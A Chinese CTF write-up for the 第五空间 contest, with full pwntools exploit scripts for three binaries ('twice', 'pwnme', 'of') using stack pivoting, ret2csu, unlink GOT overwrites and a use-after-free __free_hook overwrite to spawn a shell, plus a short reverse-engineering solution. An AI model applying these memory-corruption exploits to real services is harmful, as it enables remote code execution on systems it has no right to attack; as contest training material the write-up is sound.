第五空间 部分题解

PWN

twice（栈迁移，ret2csu）

第一次先泄露出canary和rbp地址
第二次栈迁移+ROP，先puts泄露出libc，然后ret2csu把新的ROPchain读进来

from pwn import *
from LibcSearcher import *

r = remote("121.36.59.116", 9999)
#r = process("./twice/pwn")
context(arch='amd64', os='linux', log_level='debug')
DEBUG = 0
if DEBUG:
	gdb.attach(r,
	'''
	b *0x400844
	b *0x40087A
	b *0x40091A
	c
	''')
elf = ELF("./twice/pwn")
read_got = elf.got['read']
puts = elf.plt['puts']
pop_rdi = 0x400923
leave = 0x400879
csu1 = 0x40091A
csu2 = 0x400900
ret = 0x40087A

r.recvuntil(">")
r.send('a'*89)
r.recvuntil('a'*89)
canary = u64('\x00' + r.recv(7))
rbp = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
buf = rbp - 0x70
success("canary:"+hex(canary))
success("rbp:"+hex(rbp))
r.recvuntil(">")
payload = p64(pop_rdi) + p64(read_got) + p64(puts)
payload += p64(csu1) + p64(0) + p64(1) + p64(read_got) + p64(0x1000) + p64(rbp) + p64(0) + p64(csu2)
payload = payload.ljust(88, 'a') + p64(canary) + p64(buf-8) + p64(leave)
r.send(payload)
r.recvuntil('\n')
read_addr = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
success("read:"+hex(read_addr))
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
system = libc_base + libc.dump("system")
bin_sh = libc_base + libc.dump("str_bin_sh")
payload = p64(ret)*20 + p64(pop_rdi) + p64(bin_sh) + p64(system)
r.sendline(payload)
r.interactive()

pwnme

直接unlink改GOT表，和x86 32位一个做法，比赛的时候看错偏移没打通

from pwn import *
from LibcSearcher import *

r = remote("121.36.58.215", 1337)
#r = process("./twice/pwn")
context(arch='arm', os='linux', log_level='debug')
DEBUG = 0
if DEBUG:
	gdb.attach(r,
	'''
	b *0x400844
	b *0x40087A
	b *0x40091A
	c
	''')
elf = ELF("./pwnme5/a.out")
libc = ELF('./pwnme5/lib/libuClibc-1.0.34.so')
atoi_got = elf.got['atoi']
content = 0x00021068

menu = ">>> "
def add(size, content):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Length:")
	r.sendline(str(size))
	r.recvuntil("Tag:")
	r.send(content)

def delete(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Tag:")
	r.sendline(str(index))

def show():
	r.recvuntil(menu)
	r.sendline('1')

def edit(index, size, content):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Index:")
	r.sendline(str(index))
	r.recvuntil("Length:")
	r.sendline(str(size))
	r.recvuntil("Tag:")
	r.send(content)



add(0x78, 'chunk0\n')
add(0x78, 'chunk1\n')
add(0x78, 'chunk2\n')
add(0x74, 'chunk3\n')
add(0xf8, 'chunk4\n')
add(0x20, 'chunk5\n')


payload = p32(0) + p32(0x71) + p32(content+0x1c-0xc) + p32(content+0x1c-0x8) + 'a'*0x60 + p32(0x70)
edit(3, len(payload), payload)
#pause()
delete(4)
#pause()
#shellcode = asm(shellcraft.sh())
payload = p32(0)*2 + p32(0x100) + p32(content) + p32(4) + p32(atoi_got)
edit(3, len(payload), payload)
show()
r.recvuntil("4 : ")
atoi = u32(r.recv(4))
success("atoi:"+hex(atoi))
libc.address = atoi - libc.sym['atoi']
system = libc.sym['system']
edit(4, 4, p32(system))
r.recvuntil(menu)
r.sendline('/bin/sh\x00')

r.interactive()

of

给的文件居然和远程不一样，远程可以直接UAF

from pwn import *

r = remote("121.36.74.70", 9999)
#r = process("./of/of")

context.log_level = 'debug'
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *$rebase(0xED0)
	c
	''')


elf = ELF("./of/of")
#libc = ELF('./libc_xing/libc-2.27.so')
libc = ELF('./of/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]


menu = "Your choice: "
def add(index):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("Index: ")
	r.sendline(str(index))

def delete(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Index: ")
	r.sendline(str(index))

def show(index):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Index: ")
	r.sendline(str(index))

def edit(index, payload):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Index: ")
	r.sendline(str(index))
	r.recvuntil("Content: ")
	r.send(payload)

def get_cookie():
	cookie = ''
	while True:
		if len(cookie) == 8:
			break
		for i in range(256):
			add(0)
			payload = 'a'*0xf8 + cookie + chr(i)
			edit(0, payload)
			show(0)
			recved = r.recv(len("Content: "))
			if recved == "Content: ":
				cookie += chr(i)
				break

	return cookie
	

#cookie = u64(get_cookie())
#success("cookie:"+hex(cookie))
for i in range(8):
	add(i)

for i in range(8):
	delete(7-i)

show(0)
r.recvuntil("Content: ")
malloc_hook = u64(r.recv(8)) - 0x60 - 0x10
success("malloc_hook:"+hex(malloc_hook))
libc.address = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc.sym['__free_hook']
system = libc.sym['system']


for i in range(8):
	add(0)
add(0)
delete(0)
edit(0, p64(free_hook))
add(1)
add(2)
edit(2, p64(system))
edit(1, '/bin/sh\x00')
delete(1)

r.interactive()

RE

nop

和reverse.kr的replace很像
程序逻辑如下

Input addr 0x0804a038
addr +1 > 0x0804a038
call 0x0804857b anti_debug
[0x0804a038]+1
call 080485C4 anti_debug2
getpid
getppid
getsid
[0x0804a038]+0xCCCCCCCC
call 080485C4 anti_debug2
[0x0804a038]+1
call 080485C4 anti_debug2
call patch 0x90
[0x0804a038]+1
call patch 0x90

我们需要patch这里

根据程序逻辑逆出flag

#include<stdio.h>

int main(){
	int addr = 0x08048765; 
	int a = 0xCCCCCCCC;
	int flag = addr - a  - 3;
	printf("%d\n", flag); 
}